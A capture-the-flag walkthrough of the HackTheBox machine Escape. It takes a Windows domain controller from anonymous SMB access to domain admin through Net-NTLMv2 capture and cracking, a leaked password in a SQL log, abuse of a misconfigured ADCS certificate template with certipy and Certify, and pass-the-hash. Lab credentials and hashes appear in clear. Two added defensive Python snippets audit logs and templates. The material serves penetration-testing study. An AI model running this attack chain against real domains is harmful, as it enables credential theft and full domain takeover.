HackTheBox Escape [Net-NTLMv2 + ADCS + PTH + Silver Ticket]

Summary

This post covers the domain-penetration part of the medium-difficulty HTB machine Escape. The domain-attack details (Net-NTLMv2 capture, ADCS, PTH, Silver Ticket) are what make this box distinctive. It mainly follows 0xdf's blog (Escape walkthrough) and HTB's official Escape walkthrough; I am writing it up to reinforce my own understanding and as a reference for later, deeper study.

Information gathering

nmap

nmap -p- --min-rate 10000 10.10.11.202
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49668/tcp open unknown
49691/tcp open unknown
49692/tcp open unknown
49708/tcp open unknown
49712/tcp open unknown
63474/tcp open unknown

This looks like a Windows domain controller, based on the standard Windows ports such as SMB (445), NetBIOS (135/139), LDAP (389 etc.) and WinRM (5985), plus 53 (DNS) and 88 (Kerberos), which are typically found on a DC. There is also an MSSQL server (1433).

Running nmap's LDAP scripts reveals the domain name sequel.htb. The TLS certificate is for dc.sequel.htb. Add these, along with the hostname dc, to /etc/hosts:

10.10.11.202    dc.sequel.htb sequel.htb dc

Finally, note that this server's clock is 8 hours off from the local clock. It will need to be synchronized before doing Kerberos operations.

TLS certificate

To look more closely at the TLS certificate in use, pull it with openssl and format it:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# openssl s_client -showcerts -connect 10.10.11.202:3269 | openssl x509 -noout -text
Can't use SSL_get_servername
depth=0 CN = dc.sequel.htb
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN = dc.sequel.htb
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 CN = dc.sequel.htb
verify return:1
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
1e:00:00:00:04:90:52:7b:fc:91:38:74:2f:00:00:00:00:00:04
Signature Algorithm: sha256WithRSAEncryption
Issuer: DC = htb, DC = sequel, CN = sequel-DC-CA
Validity
Not Before: Nov 18 21:20:35 2022 GMT
Not After : Nov 18 21:20:35 2023 GMT
Subject: CN = dc.sequel.htb
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
1.3.6.1.4.1.311.20.2:
. .D.o.m.a.i.n.C.o.n.t.r.o.l.l.e.r
X509v3 Extended Key Usage:
TLS Web Client Authentication, TLS Web Server Authentication
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
S/MIME Capabilities:
......0...`.H.e...*0...`.H.e...-0...`.H.e....0...`.H.e....0...+....0
..*.H..
X509v3 Subject Key Identifier:
22:E2:60:5F:A1:1E:F7:90:9E:56:2A:7B:95:BB:4C:0E:DE:6C:58:87
X509v3 Authority Key Identifier:
62:9F:32:A3:A0:F0:38:20:D4:60:C0:CD:6D:C5:FA:51:30:5E:C3:15
X509v3 CRL Distribution Points:
Full Name:
URI:ldap:///CN=sequel-DC-CA,CN=dc,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint
Authority Information Access:
CA Issuers - URI:ldap:///CN=sequel-DC-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?cACertificate?base?objectClass=certificationAuthority
X509v3 Subject Alternative Name:
othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
Signature Algorithm: sha256WithRSAEncryption
Signature Value:

read:errno=104

Note the certificate authority that issued the certificate: sequel-DC-CA.

SMB - TCP 445

List

Accessing SMB with crackmapexec:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# crackmapexec smb 10.10.11.202 --shares
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

With an arbitrary username and an empty password:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# crackmapexec smb 10.10.11.202 -u fdnotreallyausername -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\fdnotreallyausername:
SMB 10.10.11.202 445 DC [+] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share

Public

The only share that can be accessed is Public. Using -N for a null password, download the pdf file:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# smbclient //10.10.11.202/Public -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022

5184255 blocks of size 4096. 1470835 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (8.3 KiloBytes/sec) (average 8.3 KiloBytes/sec)

SQL Server Procedures.pdf

The document is only a little over one page long, and it contains information for connecting to MSSQL:

user PublicUser and password GuestUserCantWrite1

This username/password does not work for connecting over WinRM.

MSSQL

With these creds, it is possible to connect to the MSSQL server. Using the Impacket tool mssqlclient.py, there are four databases on the server:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> select name from master..sysdatabases;
name

--------------------------------------------------------------------------------------------------------------------------------

master

tempdb

model

msdb

SQL>

Additional enumeration

There is more enumeration that could be done at this point:

  • Check DNS for zone transfers / brute-force subdomains.
  • Enumerate LDAP, with and without the password.
  • Run Bloodhound with the password.
  • Kerberoast with the password.
  • Brute-force usernames/passwords via Kerberos.

Given the hints so far (the domain name, the fact that the document is about MSSQL), I'll follow that direction first and come back to enumerate again if needed.

Shell as sql_svc

Running commands fails

The first thing to try is running commands through the MSSQL server with the xp_cmdshell stored procedure. It fails:

SQL> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

Trying to enable it (as shown in Scrambled's Alternative Roots) fails as well; this account doesn't have the permission:

SQL> EXECUTE sp_configure 'show advanced options', 1
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.

Getting Net-NTLMv2

There's no useful data in the databases, and commands can't be run. The next thing to try is making the SQL server connect back to my host and authenticate, capturing a challenge/response that can then be brute-forced. This is shown in both Querier and Getting Creds via NTLMv2.

Start Responder as root here, listening on the tun0 interface for a whole set of services.

The only one of interest is SMB. Now tell MSSQL to read a file from a share on my host:

SQL> EXEC xp_dirtree '\\10.10.16.2\share', 1, 1

Nothing is returned, but Responder has a "hash":

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.3.0

To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.2]
Responder IPv6 [dead:beef:4::1000]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Current Session Variables:
Responder Machine Name [WIN-H6VOL0QMDH2]
Responder Domain Name [ZXWC.LOCAL]
Responder DCE-RPC Port [49831]

[+] Listening for events...

[!] Error starting TCP server on port 53, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:a052ed...[snip]...

Cracking the Net-NTLMv2 hash

Crack it with hashcat. Auto-detect identifies hash type 5600:

hashcat.exe -m 5600 password.txt rockyou.txt

Approaching final keyspace - workload adjusted.

sql_svc::sequel:a052ed...[snip]...ronnie

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:a052ed0636102870:e34517e6d5f61d5423...000000
Time.Started.....: Mon Jun 19 12:21:19 2023 (1 sec)
Time.Estimated...: Mon Jun 19 12:21:20 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18688.5 kH/s (4.62ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Speed.#3.........: 447.9 kH/s (9.23ms) @ Accel:16 Loops:1 Thr:64 Vec:1
Speed.#*.........: 19136.3 kH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12910592/14344386 (90.00%)
Rejected.........: 0/12910592 (0.00%)
Restore.Point....: 9633792/14344386 (67.16%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: benbaay -> 2322434917
Candidates.#3....: 2229sr -> 2129
Hardware.Mon.#1..: Temp: 53c Util: 23% Core:1245MHz Mem:6000MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Mon Jun 19 12:20:58 2023
Stopped: Mon Jun 19 12:21:21 2023
  • Password: REGGIE1234ronnie

WINRM

With this password, Evil-WinRM gives a shell as sql_svc:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc

Shell as Ryan.Cooper

Enumeration

File system

sql_svc's home directory is basically empty. Ryan.Cooper is the only other user with a home directory on the host:

*Evil-WinRM* PS C:\users> ls


Directory: C:\users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc

In the root of C:, the Public and SQLServer folders are unusual:

*Evil-WinRM* PS C:\> ls


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows

Public contains only the SQL Server Procedures.pdf file.

SQLServer looks like an installation directory:

*Evil-WinRM* PS C:\SQLServer> ls

Directory: C:\SQLServer

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe

There is a single file in the Logs directory:

*Evil-WinRM* PS C:\SQLServer\Logs> ls

Directory: C:\SQLServer\Logs

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK

ERRORLOG.BAK

This file contains logs from the SQL server:

*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)

2022-11-18 13:43:05.97 Server UTC adjustment: -8:00
2022-11-18 13:43:05.97 Server (c) Microsoft Corporation.
2022-11-18 13:43:05.97 Server All rights reserved.
2022-11-18 13:43:05.97 Server Server process ID is 3788.
2022-11-18 13:43:05.97 Server System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'.
2022-11-18 13:43:05.97 Server Authentication mode is MIXED.
...[snip]...

Near the end of the log there are these messages:

...[snip]...
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...[snip]...

It looks like Ryan.Cooper may have mistyped his password, entering the password "NuclearMosquito3" in the username field. That can happen if Ryan hits enter instead of tab while logging in.
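As an added defender-side example (my code, not part of the original write-up): a small checker that scans SQL Server ERRORLOG lines for failed logons whose "user" value is not a recognisable principal, which is exactly the pattern that leaked Ryan.Cooper's password above. The sample lines are constructed from the excerpt (plus one extra PublicUser line), and the known-logins list is an assumption.

```python
import re

# Constructed sample in the shape of the ERRORLOG.BAK excerpt above; the third
# line is the give-away, because 'NuclearMosquito3' is not a principal at all.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:09.10 Logon       Logon failed for user 'PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.16.2]
"""

LOGON_FAIL_RE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+Logon\s+Logon failed for user '(?P<user>[^']*)'"
    r"\. Reason: (?P<reason>[^.]+)\..*?\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_logon_failures(text):
    """Yield a dict per 'Logon failed for user ...' line (timestamp, user, reason, client)."""
    for line in text.splitlines():
        m = LOGON_FAIL_RE.match(line)
        if m:
            yield m.groupdict()


def looks_like_principal(name, known_logins):
    """A plausible login is DOMAIN\\user, user@domain, or a SQL login we know about."""
    if "\\" in name or "@" in name:
        return True
    return name.lower() in {k.lower() for k in known_logins}


def find_password_in_username(text, known_logins):
    """Return failed-logon events whose 'user' field is not a recognisable principal.

    Such events are a strong hint that someone typed a password into the username
    box, so the ERRORLOG now holds that password in clear text and the account
    should be treated as exposed (and the log redacted before it is shared).
    """
    return [ev for ev in parse_logon_failures(text)
            if not looks_like_principal(ev["user"], known_logins)]


def redact_value(text, value):
    """Replace a leaked value everywhere in the text before the log leaves the host."""
    return text.replace(value, "<REDACTED>")


if __name__ == "__main__":
    # known_logins is an assumption standing in for the real SQL login list.
    hits = find_password_in_username(SAMPLE_ERRORLOG, known_logins=["PublicUser", "sa"])
    for ev in hits:
        print(f"{ev['ts']} possible password-as-username from {ev['client']}: {ev['user']!r}")
    print(redact_value(SAMPLE_ERRORLOG, hits[0]["user"]))
```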

WinRM

Connect over WinRM with that password:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# evil-winrm -i 10.10.11.202 -u ryan.cooper -p NuclearMosquito3

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cat ../Desktop/user.txt
47e8a7ffa5ff5b79ea0eeb5906ec2a46

Shell as administrator

Enumeration

Confirming ADCS

One thing to always enumerate on a Windows domain is Active Directory Certificate Services (ADCS). A quick way to check is with crackmapexec (this works as either sql_svc or Ryan.Cooper):

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# crackmapexec ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.202 636 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3
ADCS Found PKI Enrollment Server: dc.sequel.htb
ADCS Found CN: sequel-DC-CA

This is the same CA found earlier.

Identifying a vulnerable template

With ADCS running, the next question is whether any of its templates are configured insecurely. To enumerate further, download Certify from SharpCollection and upload it to Escape:

*Evil-WinRM* PS C:\programdata> upload Certify.exe

Info: Uploading /root/hackthebox/machine/escape/Certify.exe to C:\programdata\Certify.exe

Data: 236884 bytes of 236884 bytes copied

Info: Upload successful!

Certify's README describes how to enumerate and abuse certificate services. It first shows running Certify.exe find /vulnerable, which by default checks against the standard low-privilege groups; adding /currentuser checks against the current user's groups instead. Either approach works here.

After printing some information about the Enterprise CA, it lists one vulnerable certificate template:

*Evil-WinRM* PS C:\programdata> .\Certify.exe find /vulnerable /currentuser

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0

[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.7916004

The danger here is that sequel\Domain Users has enrollment rights on the template (this is scenario 3 in the Certify README).

Abusing the template

Method 1: certipy

So a vulnerable template named UserAuthentication really does exist. In particular, Authenticated Users can enroll in this template, and because msPKI-Certificate-Name-Flag is present and contains ENROLLEE_SUPPLIES_SUBJECT, the template is vulnerable to the attack described in Investigating Certificate Template Enrollment Attacks – (ADCS). Essentially, this lets anyone enroll in the template and specify an arbitrary Subject Alternative Name, which means this attack path can be used to authenticate as a domain administrator.
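As an added auditing example (my code, not Certify's or the box author's), here is the ESC1 check written out over the UserAuthentication template values from the Certify output above: all five conditions must hold, and the hardened variant, which drops ENROLLEE_SUPPLIES_SUBJECT so the CA fills the subject and SAN from AD, no longer qualifies. Flag names are used as Certify prints them; the list of low-privilege groups is an assumption.

```python
from dataclasses import dataclass

# Groups that effectively mean "any domain account" (assumption: extend for your domain).
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone", "Users"}
# EKUs that let a certificate be used to log on (an empty EKU list means any purpose).
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}


@dataclass
class Template:
    name: str
    name_flags: set           # msPKI-Certificate-Name-Flag names, as Certify prints them
    enrollment_flags: set     # msPKI-Enrollment-Flag names, as Certify prints them
    signatures_required: int  # "Authorized Signatures Required"
    ekus: set                 # pkiextendedkeyusage / mspki-certificate-application-policy
    enroll_principals: set    # principals holding Enroll on the template, "DOMAIN\\Group" form


def _short(principal):
    """'sequel\\Domain Users' -> 'Domain Users', so group names compare across domains."""
    return principal.split("\\")[-1]


def esc1_findings(t):
    """List the ESC1 conditions this template meets; all five must hold for the abuse above."""
    findings = []
    if {_short(p) for p in t.enroll_principals} & LOW_PRIV_PRINCIPALS:
        findings.append("low-privilege principals can enroll")
    if "PEND_ALL_REQUESTS" not in t.enrollment_flags:
        findings.append("no manager approval required")
    if t.signatures_required == 0:
        findings.append("no authorized signatures required")
    if not t.ekus or t.ekus & AUTH_EKUS:
        findings.append("certificate usable for authentication")
    if "ENROLLEE_SUPPLIES_SUBJECT" in t.name_flags:
        findings.append("enrollee supplies the subject / SAN")
    return findings


def is_esc1(t):
    return len(esc1_findings(t)) == 5


def hardened(t):
    """One remediation: the CA builds subject and SAN from AD instead of trusting the request."""
    return Template(
        name=t.name + " (hardened)",
        name_flags=(t.name_flags - {"ENROLLEE_SUPPLIES_SUBJECT"}) | {"SUBJECT_ALT_REQUIRE_UPN"},
        enrollment_flags=set(t.enrollment_flags),
        signatures_required=t.signatures_required,
        ekus=set(t.ekus),
        enroll_principals=set(t.enroll_principals),
    )


# The UserAuthentication template exactly as the Certify output above reports it.
USER_AUTHENTICATION = Template(
    name="UserAuthentication",
    name_flags={"ENROLLEE_SUPPLIES_SUBJECT"},
    enrollment_flags={"INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"},
    signatures_required=0,
    ekus={"Client Authentication", "Encrypting File System", "Secure Email"},
    enroll_principals={"sequel\\Domain Admins", "sequel\\Domain Users", "sequel\\Enterprise Admins"},
)

if __name__ == "__main__":
    for tmpl in (USER_AUTHENTICATION, hardened(USER_AUTHENTICATION)):
        print(tmpl.name, "ESC1" if is_esc1(tmpl) else "not ESC1", esc1_findings(tmpl))
```

Requiring manager approval (PEND_ALL_REQUESTS) or restricting Enroll to an admin-only group would each break the chain as well, which the same function shows.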

To exploit this, use certipy:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ntpdate -u dc.sequel.htb
2023-06-19 09:28:43.681199 (-0400) +1.777965 +/- 0.337931 dc.sequel.htb 10.10.11.202 s1 no-leap
CLOCK: time stepped by 1.777965

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-DC-CA -template UserAuthentication
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
  • Note: if the error "The NETBIOS connection with the remote host timed out." appears, rerun the command.

Now that there is a certificate for administrator, certipy can be used again to get a Ticket Granting Ticket (TGT) and extract that user's NT hash. Since this step involves Kerberos interaction, the clock has to be synchronized with the remote machine's time before continuing.

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

Finally, pass the hash over WinRM to authenticate as the administrator user.

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ls
administrator.ccache administrator.pfx Certify.exe 'SQL Server Procedures.pdf'

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# evil-winrm -i sequel.htb -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
427e2e823cf867a7a25b8f6d9943be9b

Method 2: Certify + Rubeus

Continuing with README scenario 3, the next step is to run Certify.exe to request a certificate with administrator as the alternate name. It returns a cert.pem:

*Evil-WinRM* PS C:\programdata> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0

[*] Action: Request a Certificates

[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : administrator

[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA

[*] CA Response : The certificate had been issued.
[*] Request ID : 14

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----
...[snip]...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
...[snip]...
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:14.7055362

Both the README and the end of the output show the next step. Copy everything from -----BEGIN RSA PRIVATE KEY----- through -----END CERTIFICATE----- into a file on the Kali host and convert it to .pfx with the given command, entering no password at the prompt:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ls -la cert.pfx
-rw------- 1 root root 3425 Jun 19 09:52 cert.pfx

